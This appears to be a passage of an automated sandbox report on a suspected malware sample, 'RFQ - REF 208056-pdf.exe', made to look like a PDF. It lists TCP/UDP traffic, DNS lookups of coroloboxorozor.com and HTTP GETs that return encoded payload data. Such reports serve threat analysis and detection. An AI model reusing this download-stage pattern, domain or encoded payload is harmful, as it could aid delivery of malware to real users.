                                                                                                                                        Feb 25, 2021 15:14:52.364285946 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.365430117 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.417988062 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465615988 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465637922 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465653896 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465670109 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465684891 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465701103 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465719938 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465737104 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465739012 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.465753078 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465771914 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.465796947 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.465817928 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.466867924 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.466895103 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.466974020 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.468111992 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.468132019 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.468204975 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.469341040 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.469357967 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.469443083 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.470649958 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.470670938 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.470772982 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.471813917 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.471831083 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.471901894 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.473031998 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.473051071 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.473100901 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.474273920 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.474292040 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.474371910 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.475523949 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.475549936 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.475608110 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.476728916 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.476746082 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.476811886 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.477948904 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.477983952 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.478038073 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.518335104 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.518618107 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.518634081 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.518681049 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.519840956 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.519870996 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.519900084 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.521090984 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.521110058 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.521155119 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.522335052 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.522353888 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.522396088 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.523680925 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.523741007 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.523770094 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.524805069 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.524861097 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.524899006 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.526032925 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.526083946 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.526129007 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.527286053 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.527344942 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.527374029 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.528554916 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.528610945 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.528639078 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.529841900 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.529941082 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.529957056 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.530977964 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.531006098 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.531043053 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.532193899 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.532254934 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.532828093 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.532854080 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.532912970 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.534027100 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.534054041 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.534128904 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.535274982 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.535303116 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.535376072 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.536498070 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.536525965 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.536580086 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.537689924 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.537729979 CET8049708172.67.172.17192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.537782907 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.538955927 CET8049708172.67.172.17192.168.2.7

                                                                                                                                        UDP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Feb 25, 2021 15:14:42.320991039 CET5856253192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:42.369988918 CET53585628.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:42.905304909 CET5659053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:42.953999996 CET53565908.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:43.039055109 CET6050153192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:43.090524912 CET53605018.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:43.652695894 CET5377553192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:43.701275110 CET53537758.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:44.430409908 CET5183753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:44.481985092 CET53518378.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:45.665275097 CET5541153192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:45.714018106 CET53554118.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:46.501280069 CET6366853192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:46.562380075 CET53636688.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:46.772095919 CET5464053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:46.830260038 CET53546408.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:47.819083929 CET5873953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:47.876095057 CET53587398.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:48.678502083 CET6033853192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:48.727428913 CET53603388.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:49.604418039 CET5871753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:49.656213999 CET53587178.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:50.970315933 CET5976253192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:51.027477980 CET53597628.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.227377892 CET5432953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:52.266187906 CET5805253192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:52.286699057 CET53543298.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:52.323025942 CET53580528.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:53.646142960 CET5400853192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:53.694891930 CET53540088.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:54.989964962 CET5945153192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:55.038955927 CET53594518.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:56.140577078 CET5291453192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:56.200483084 CET53529148.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:57.026561022 CET6456953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:57.075231075 CET53645698.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:14:58.329045057 CET5281653192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:14:58.386085033 CET53528168.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:00.233880997 CET5078153192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:00.291140079 CET53507818.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:01.246907949 CET5423053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:01.304428101 CET53542308.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:02.538969994 CET5491153192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:02.587876081 CET53549118.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:03.817676067 CET4995853192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:03.866599083 CET53499588.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:08.924525976 CET5086053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:08.976069927 CET53508608.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:09.676964998 CET5045253192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:09.735716105 CET53504528.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:10.125627995 CET5973053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:10.174272060 CET53597308.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:11.383310080 CET5931053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:11.434881926 CET53593108.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:35.732686043 CET5191953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:35.781481981 CET53519198.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:38.285643101 CET6429653192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:38.346791029 CET53642968.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:39.182588100 CET5668053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:39.234323978 CET53566808.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:48.487034082 CET5882053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:48.544307947 CET53588208.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:58.574222088 CET6098353192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:58.632570028 CET53609838.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:15:59.755233049 CET4924753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:15:59.812334061 CET53492478.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:16:57.773159981 CET5228653192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:16:57.824862957 CET53522868.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:03.038863897 CET5606453192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:03.088109970 CET53560648.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:04.075108051 CET6374453192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:04.126898050 CET53637448.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:14.776185989 CET6145753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:14.844110966 CET53614578.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:15.459316015 CET5836753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:15.519458055 CET53583678.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:16.013664007 CET6059953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:16.073896885 CET53605998.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:16.592931032 CET5957153192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:16.653251886 CET53595718.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:17.293025017 CET5268953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:17.350063086 CET53526898.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:17.738717079 CET5029053192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:17.798995018 CET53502908.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:18.278040886 CET6042753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:18.335778952 CET53604278.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:18.785022974 CET5620953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:18.852471113 CET53562098.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:19.402239084 CET5958253192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:19.453866959 CET53595828.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:20.119093895 CET6094953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:20.176529884 CET53609498.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:20.581614971 CET5854253192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:20.633457899 CET53585428.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:42.674061060 CET5917953192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:42.748486996 CET53591798.8.8.8192.168.2.7
                                                                                                                                        Feb 25, 2021 15:17:46.638592958 CET6092753192.168.2.78.8.8.8
                                                                                                                                        Feb 25, 2021 15:17:46.687315941 CET53609278.8.8.8192.168.2.7

                                                                                                                                        DNS Queries

                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                        Feb 25, 2021 15:14:52.227377892 CET192.168.2.78.8.8.80xbfacStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 15:15:48.487034082 CET192.168.2.78.8.8.80x3f47Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 15:15:59.755233049 CET192.168.2.78.8.8.80x6eb5Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)

                                                                                                                                        DNS Answers

                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                        Feb 25, 2021 15:14:52.286699057 CET8.8.8.8192.168.2.70xbfacNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 15:14:52.286699057 CET8.8.8.8192.168.2.70xbfacNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 15:15:48.544307947 CET8.8.8.8192.168.2.70x3f47No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 15:15:48.544307947 CET8.8.8.8192.168.2.70x3f47No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 15:15:59.812334061 CET8.8.8.8192.168.2.70x6eb5No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 15:15:59.812334061 CET8.8.8.8192.168.2.70x6eb5No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • coroloboxorozor.com

                                                                                                                                        HTTP Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        0192.168.2.749708172.67.172.1780C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Feb 25, 2021 15:14:52.365430117 CET487OUTGET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Feb 25, 2021 15:14:52.465615988 CET489INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 14:14:52 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=dbc716cc65372234f1ff492153c944e7d1614262492; expires=Sat, 27-Mar-21 14:14:52 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 07:33:02 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087b23f4f40000d91da5a73000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2FF5NnE%2BgarnN6Z0huU8XXpBQ0dnO0ggOWrdiWCHEm6e78UiW05FjIBEBksZjCyfVM7jQN6tDXJOj%2FG3olHBE2SNojcX9Q2YVP3GqDaK9ySqVZJhb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 627209018f02d91d-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 37 63 37 39 0d 0a 3c 70 3e 69 69 59 49 62 59 63 75 75 59 62 59 58 59 62 59 62 59 62 59 75 59 62 59 62 59 62 59 56 4a 4a 59 56 4a 4a 59 62 59 62 59 63 43 75 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 54 75 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 63 56 43 59 62 59 62 59 62 59 63 75 59 58 63 59 63 43 54 59 63 75 59 62 59 63 43 62 59 49 59 56 62 4a 59 58 58 59 63 43 75 59 63 59 69 54 59 56 62 4a 59 58 58 59 43 75 59 63 62 75 59 63 62 4a 59 63 63 4a 59 58 56 59 63 63 56 59 63 63 75 59 63 63 63 59 63 62 58 59 63 63 75 59 49 69 59 63 62 49 59 58 56 59 49 49 59 49 69 59 63 63 62 59 63 63 62 59 63 63 63 59 63 63 54 59 58 56 59 49 43 59 63 62 63 59 58 56 59 63 63 75 59 63 63 69 59 63 63 62 59 58 56 59 63 62 4a 59 63 63 62 59 58 56 59 54 43 59 69 49 59 43 58 59 58 56 59 63 62 49 59 63 63 63 59 63 62 62 59 63 62 63 59 75 54 59 63 58 59 63 58 59 63 62 59 58 54 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 43 62 59 54 49 59 62 59 62 59 69 54 59 63 59 58 59 62 59 69 54 59 63 75 56 59 75 63 59 63 43 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 56 56 75 59 62 59 58 75 59 62 59 63 63 59 63 59 43 62 59 62 59 62 59 63 75 56 59 63 62 59 62 59 62 59 54 59 62 59 62 59 62 59 62 59 62 59 62 59 63 75
                                                                                                                                        Data Ascii: 7c79<p>iiYIbYcuuYbYXYbYbYbYuYbYbYbYVJJYVJJYbYbYcCuYbYbYbYbYbYbYbYTuYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYcVCYbYbYbYcuYXcYcCTYcuYbYcCbYIYVbJYXXYcCuYcYiTYVbJYXXYCuYcbuYcbJYccJYXVYccVYccuYcccYcbXYccuYIiYcbIYXVYIIYIiYccbYccbYcccYccTYXVYICYcbcYXVYccuYcciYccbYXVYcbJYccbYXVYTCYiIYCXYXVYcbIYcccYcbbYcbcYuTYcXYcXYcbYXTYbYbYbYbYbYbYbYCbYTIYbYbYiTYcYXYbYiTYcuVYucYcCbYbYbYbYbYbYbYbYbYVVuYbYXuYbYccYcYCbYbYbYcuVYcbYbYbYTYbYbYbYbYbYbYcu
                                                                                                                                        Feb 25, 2021 15:14:53.094329119 CET1558OUTGET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Feb 25, 2021 15:14:53.167872906 CET1563INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 14:14:53 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=dc1d1248b966ca8bd7311a77a9a6eb6681614262493; expires=Sat, 27-Mar-21 14:14:53 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 07:33:05 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087b23f7c90000d91da9962000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=pIT2Oudj%2FuhP%2FFWSxVf6Gu5wWaLl71LKEoBxM40092Y1aQuhoOPtR4cwTTZdDueUi4qbeBV%2B4ZWoxvRlFqkIs2oXJBbMt2opYM24wYEztWMHkL5E"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 627209060db9d91d-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 33 34 36 37 0d 0a 3c 70 3e 59 56 75 59 63 4a 43 59 56 62 56 59 56 56 49 59 58 75 59 49 62 59 63 43 43 59 63 69 69 59 56 63 49 59 75 58 59 63 56 4a 59 63 75 4a 59 56 63 4a 59 56 58 58 59 75 75 59 63 43 4a 59 56 56 59 63 49 62 59 56 4a 63 59 63 69 58 59 56 4a 4a 59 56 58 4a 59 54 56 59 63 62 69 59 63 49 69 59 69 63 59 63 75 49 59 56 58 4a 59 75 69 59 63 63 63 59 63 49 54 59 56 4a 63 59 54 75 59 63 63 49 59 63 49 58 59 63 43 59 54 4a 59 63 54 63 59 56 49 59 56 62 49 59 54 63 59 56 58 59 56 4a 59 75 58 59 63 58 69 59 63 54 59 49 62 59 63 63 75 59 63 75 58 59 43 4a 59 63 43 62 59 56 4a 59 63 63 69 59 69 43 59 63 54 43 59 54 49 59 63 54 63 59 58 4a 59 63 62 4a 59 63 69 62 59 56 58 69 59 58 43 59 63 56 58 59 63 75 75 59 56 56 75 59 56 58 69 59 4a 63 59 63 54 58 59 56 58 49 59 56 56 54 59 56 4a 58 59 56 62 54 59 75 62 59 56 58 54 59 63 63 58 59 63 54 69 59 63 62 58 59 56 4a 58 59 63 69 4a 59 69 63 59 56 4a 4a 59 63 58 43 59 63 56 62 59 4a 4a 59 56 75 69 59 63 62 43 59 43 4a 59 63 69 59 56 4a 62 59 4a 56 59 75 49 59 69 43 59 54 4a 59 75 58 59 58 54 59 63 56 59 63 69 69 59 63 56 75 59 63 56 63 59 56 75 69 59 56 75 54 59 63 49 75 59 63 43 69 59 63 49 75 59 63 43 69 59 49 75 59 75 58 59 58 56 59 56 56 69 59 43 43 59 58 58 59 56 58 59 63 69 56 59 63 62 4a 59 4a 75 59 63 54 56 59 63 63 58 59 63 56 59 56 63 58 59 63 56 54 59 69 58 59 63 75 59 56 56 69 59 63 62 75 59 54
